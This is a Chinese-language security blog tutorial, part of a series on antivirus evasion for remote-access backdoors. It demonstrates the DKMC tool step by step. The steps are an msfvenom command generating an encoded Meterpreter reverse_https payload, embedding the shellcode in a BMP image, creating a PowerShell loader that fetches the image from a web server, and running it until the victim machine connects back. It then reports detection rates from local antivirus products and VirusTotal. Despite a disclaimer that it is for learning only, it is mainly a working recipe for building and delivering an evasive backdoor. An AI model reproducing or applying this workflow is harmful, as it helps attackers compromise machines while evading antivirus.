远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

admin 2022年5月29日01:01:53评论21 views字数 3787阅读12分37秒阅读模式

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

本专题文章导航

1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2、远控免杀专题(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4、远控免杀专题(4)-Evasion模块(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69):https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg

8、远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13/71):https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ

9、远控免杀专题(9)-Avet免杀(VT免杀率14/71):https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA

10、远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70):https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA

11、远控免杀专题(11)-Avoidz免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg

12、远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70):https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg

13、远控免杀专题(13)-zirikatu免杀(VT免杀率39/71):https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA

14、远控免杀专题(14)-AVIator免杀(VT免杀率25/69):https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q

15、远控免杀专题(15)-DKMC免杀(VT免杀率8/55):本文

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


免杀能力一览表

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。


一、DKMC介绍

DKMC是Don't Kill My Cat (DKMC)的简称,谷歌翻译为"不要杀害我的小猫咪",这个名字也是挺少女心的...DKMC是一种生成混淆的shellcode的工具,并把shellcode合成到图像文件中,最终依靠PowerShell执行最终的shellcode有效负载。

二、安装DKMC

安装比较简单

$ git clone https://github.com/Mr-Un1k0d3r/DKMC $ cd DKMC$ mkdir output

执行python dkmc.py即可

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

三、DKMC使用说明

执行python dkmc.py后可以看到5个选项,

[*] (gen)	Generate a malicious BMP image  [*] (web)	Start a web server and deliver malicious image [*] (ps)	Generate Powershell payload [*] (sc)	Generate shellcode from raw file [*] (exit)	Quit the application

翻译一下

[*] (gen)	将msf的shellcode注入到一个BMP图像[*] (web)	启动web服务用来分发BMP图像[*] (ps)	生成ps的payload[*] (sc)	将msf生成的raw文件转为shellcode[*] (exit)	退出

这几个选项可不是都能生成payload,而是一起组合来生成免杀的文件。

生成一个后门的流程大体为:

1、先利用msf生成raw文件

2、利用sc讲raw文件转换为shellcode

3、利用gen将上一步的shellcode注入到一个BMP图像

4、利用ps生成基于powershell的BMP文件的payload

5、利用web提供的简单web服务进行分发BMP文件

4和5看起来有点乱,下面我演示一下就很容易明白了。

四、利用DKMC生成后门

1、先利用Msf生成raw格式的shellcode,稍微编码了一下

msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "x00" -i 5 -a x86 -f raw -o /root/test15.raw
远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

2、在主菜单中选择sc,然后设置source/root/test15.raw,再执行run生成shellcode。

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

复制一下生成的shellcode,输入exit退回到主菜单。

3、在主菜单中选择gen,然后设置shellcode为上一步中生成的shellcode。

其他默认即可,执行run生成图像。

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

看到生成了output-1577907077.bmp图像文件,输入exit退回到主菜单。

4、在主菜单中选择ps,设置url地址,这个url地址就是web分发图像文件的地址。

我的parrot虚拟机的地址为10.211.55.24,我打算用默认的80端口,这样我的url地址为http://10.211.55.24/output-1577907077.bmp

使用命令set url http://10.211.55.24/output-1577907077.bmp,然后执行run生成powershell执行脚本。

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

复制一下生成的ps代码,输入exit退回到主菜单。

5、最后一步,在主菜单中选择web,使用默认80端口,执行run即可。

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

访问虚拟机的80端口

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

图像可以正常打开

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

6、在我的测试机器上执行第4步生成的ps代码,不开杀软的时候可正常上线

我将ps执行代码中的-w hidden先去掉,这样可以看得直观一些

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)
远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

7、打开杀软进行测试

静态查杀都通过

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

在执行powershell代码时,火绒和360卫士会拦截报警,360杀毒没有反应

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)
远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

virustotal.com上BMP文件的查杀率为5/55,查杀出来为BMP木马

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

virustotal.com上ps代码的查杀率为8/55,判断ps下载行为。

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

四、小结

DKMC主要把shellcode注入到bmp图像中,然后使用powershell来执行其中的shellcode,但是很多杀软都会监测powershell的执行动作,所以virustotal.com的静态检测不足以说明什么。其实还可以进一步对ps执行代码进行混淆免杀,这一点后续文章还会涉及这里就不展开说了。

参考

官方说明文档:https://github.com/Mr-Un1k0d3r/DKMC




E




N




D






远控免杀专题(15)-DKMC免杀(VT免杀率8/55)


guān




zhù







men





Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(15)-DKMC免杀(VT免杀率8/55)





原文始发于微信公众号(白帽子):远控免杀专题(15)-DKMC免杀(VT免杀率8/55)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月29日01:01:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   远控免杀专题(15)-DKMC免杀(VT免杀率8/55)https://cn-sec.com/archives/1061915.html

发表评论

匿名网友 填写信息